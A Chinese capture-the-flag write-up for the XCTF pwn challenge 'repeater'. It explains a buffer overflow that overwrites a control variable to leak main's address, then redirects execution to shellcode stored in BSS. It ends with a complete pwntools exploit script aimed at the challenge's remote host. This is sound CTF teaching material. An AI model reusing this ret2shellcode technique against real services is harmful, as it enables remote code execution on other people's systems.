攻防世界 repeater 题解

查看程序保护情况,开启了PIE,没开NXRELRO全开。

在ida64中打开分析程序,这道题程序比较简单。可以发现的信息如下:

  • 字符数组s大小为0x20,但可以读入0x40的长度,起始于rbp-30h处(见红框)

  • 变量v5可以控制循环、条件控制输出main函数地址,该变量位于rbp-20h字符数组s空间后(见粉框)

  • 通过字符串s溢出可控制变量v5的值及函数返回地址

  • 程序运行起始可输入数据到内存BSS段(见蓝框)

根据这些信息,这道题的思路就出来了:

  1. 程序起始运行,提示输入name时,输入一段shellcode(将存储到byte_202040处)

  2. 通过字符串s溢出控制变量v5的值为3281697,从而泄露出main函数地址

  3. 通过main函数地址及byte_202040main地址偏移,获得shellcode代码地址

  4. 构造溢出输入,覆盖返回地址,使程序跳转到shellcode执行,获得系统shell

这道题还是非常简单的,只是我在做的时候shellcode没选对,导致一直没利用成功(忘记改arch值)。

下面是这道题的完整代码:

from pwn import * sh = remote('61.147.171.105',50187)# 通过输入name向BSS段写入shellcodecontext.arch = 'amd64'shellcode = asm(shellcraft.sh())sh.sendlineafter('name :',shellcode)# 通过输入内容溢出修改控制变量值,泄露main地址num = 3281697payload = b'A'*0x20 + p64(num)sh.sendlineafter('input :',payload)sh.recvuntil('you :\n0x')main_addr = int(sh.recv(12),16)# 再次通过输入内容溢出,将函数返回地址改为shellcode地址shellcode_addr = main_addr + 0x202040 - 0xa33payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)sh.sendlineafter('input :',payload2)sh.interactive()

执行结果如图: